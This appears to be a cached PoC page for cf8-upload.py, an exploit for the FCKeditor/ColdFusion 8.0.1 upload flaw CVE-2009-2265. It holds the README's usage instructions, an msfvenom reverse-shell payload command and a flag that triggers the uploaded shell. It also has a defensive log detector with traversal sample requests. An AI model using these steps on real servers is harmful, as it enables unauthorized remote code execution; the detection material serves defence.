PoC details: a65e7ff1479c86c8e1ea537f1d111347732210cc

Source
Related vulnerability
Title: FCKeditor path traversal vulnerability (CVE-2009-2265)
Description: FCKeditor is an open-source editor, maintained by an individual developer, for editing HTML directly in a web page. A path traversal vulnerability exists in FCKeditor's editor/filemanager/browser/default/connectors/php/connector.php module: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
Description
cf8-upload.py | CVE-2009-2265
Introduction
# cf8-upload.py ⭐
a python3 script to exploit CVE-2009-2265.

## the exploit - CVE-2009-2265 ❗
the script exploits a vulnerability in FCKeditor < 2.6.4.1, which was bundled with adobe coldfusion 8.0.1:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265  
the script lets the user submit a file for upload to a target running coldfusion 8.0.1 and then execute it.
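From the defender's side, the same upload requests this script sends leave a recognisable trace in the web server access log: a request to the FCKeditor file-manager connector whose folder parameter carries a `..` traversal sequence. The detector below is an added example written for this page, not part of the cf8-upload.py project. It assumes the connector's `Command=FileUpload` query parameter and the `CurrentFolder` parameter name (FCKeditor connector conventions, matching the `$currentFolder` argument in the vulnerable `FileUpload` function quoted above), and it runs over a few constructed Apache-style log lines. It generalises slightly beyond the page by checking every query parameter for traversal, not only `CurrentFolder`, and by decoding percent-encoding twice so a double-encoded `%252e%252e` is also caught.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
# Lines 3 and 4 carry a traversal sequence in CurrentFolder, line 2 is a benign upload.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 210 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=../../ HTTP/1.1" 200 210 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "POST /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%252e%252e%252f%252e%252e%252f HTTP/1.1" 200 210 "-" "python-requests/2.31"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The FCKeditor connector lives under editor/filemanager/ (path from the CVE description).
CONNECTOR_MARKER = "editor/filemanager/"

# A ".." path component, with either slash style, anywhere in the value.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def has_traversal(value: str) -> bool:
    """True if value contains a '..' path component after up to two rounds of percent-decoding."""
    decoded = value
    for _ in range(2):  # parse_qs decoded once already; handle double encoding too
        decoded = unquote(decoded)
    return bool(TRAVERSAL.search(decoded))


def classify(line: str):
    """Return (client_ip, 'param=value') for a suspicious connector upload, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if CONNECTOR_MARKER not in parts.path.lower():
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    command = params.get("Command", [""])[0]
    if command.lower() != "fileupload":  # assumed connector convention (see lead-in)
        return None
    # Check every parameter, not only CurrentFolder, so renamed or extra parameters are covered.
    for key, values in params.items():
        for value in values:
            if has_traversal(value):
                return (m.group("ip"), f"{key}={value}")
    return None


def scan(log_text: str):
    """Run classify() over each line and return the list of hits."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for ip, evidence in scan(SAMPLE_LOG):
        print(f"traversal upload attempt from {ip}: {evidence}")
```

On a ColdFusion host the connector sits under the CFIDE scripts tree rather than a top-level `fckeditor/` directory, so only the `editor/filemanager/` fragment is matched; a `403` or `404` status on these lines still means an attempt was made, which is why the status code is parsed but not used to filter.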
***

## prerequisites ✔
* python3
* requests module for python3. can be installed with:
```
pip3 install requests
```
***

## usage ℹ
After identifying a target running adobe coldfusion 8.0.1, run with:
```
chmod +x cf8-upload.py
./cf8-upload.py -h
```
or
```
python3 cf8-upload.py -h
```
the -h or --help option shows how to run the script, with a few examples.
there are two positional arguments and a few optional arguments:
```
./cf8-upload.py --help
usage: cf8-upload.py [-h] [-a] [-n] [-r] address path

./cf8-upload.py exploits an LFI vulnerability in
adobe coldfusion 8.0.1

positional arguments:
  address           ip/hostname, port, sub-directories to the adobe
                    coldfusion 8.0.1 server
  path              path to file you wish to upload (eg.
                    '/path/to/file.txt')

optional arguments:
  -h, --help        show this help message and exit
  -a, --accessible  turns off features which may negatively affect
                    screen readers
  -n, --no-colour   removes colour output
  -r, --request     request webpage after successfully uploading
                    file

examples:
        ./cf8-upload.py 10.10.10.10 file.txt
        ./cf8-upload.py 10.10.10.10:8500 /path/to/reverse-shell.jsp -r
        ./cf8-upload.py hostname:8500/sub-dir /path/to/upload.zip -n
```
adobe coldfusion listens on port 8500 by default, but the full path to the server must still be given as the address argument.  
a default installation of coldfusion usually serves from the root directory on port 8500, in which case `x.x.x.x:8500` will most likely suffice for the address argument.

### --accessible argument:
by default, `cf8-upload.py` prints in colour and with some additional formatting to the terminal, which is not always helpful for those who use screen readers. the `--accessible` argument disables the fancy formatting and colour, and also disables the ascii art.

### --request argument:
this flag makes the script perform a GET request for the file, but only after it has been uploaded successfully. this is useful when uploading a reverse shell of some kind to the vulnerable application, since the request triggers it immediately. the body of the GET response is not printed to the terminal; the request only serves to trigger execution on the server.

### reverse shell example:
adobe coldfusion serves and executes `.jsp` files, so a reverse shell can be created with `msfvenom` using something as simple as:
```
msfvenom -p java/jsp_shell_reverse_tcp lhost=[my ip] lport=[my listening port] -f raw > rshell.jsp
```
and uploaded:
```
./cf8-upload.py 10.10.10.10:8500 /path/to/rshell.jsp -r
```
***

## limitations ⚠
### timeout requests
the adobe coldfusion 8.0.1 application may not allow files uploaded with the exploit script to be overwritten. in that case, uploading a different file with the same name as a previously uploaded file may result in timeouts during the upload.  
if that happens, rename the file you want to upload before attempting to upload it again.

## notes 📝
the script was mainly an exercise in creating a short, comprehensive, self-contained program for a single exploit with both readability and accessibility in mind.
***

## credits 👍
https://skerritt.blog/a11y/ - accessibility implementation.
File snapshot

```
[4.0K] /data/pocs/a65e7ff1479c86c8e1ea537f1d111347732210cc
├── [8.0K] cf8-upload.py
└── [3.7K] README.md
0 directories, 2 files
```
Cached for you by the Shenlong bot.
Notes
    1. Prefer accessing the PoC via its source.
    2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.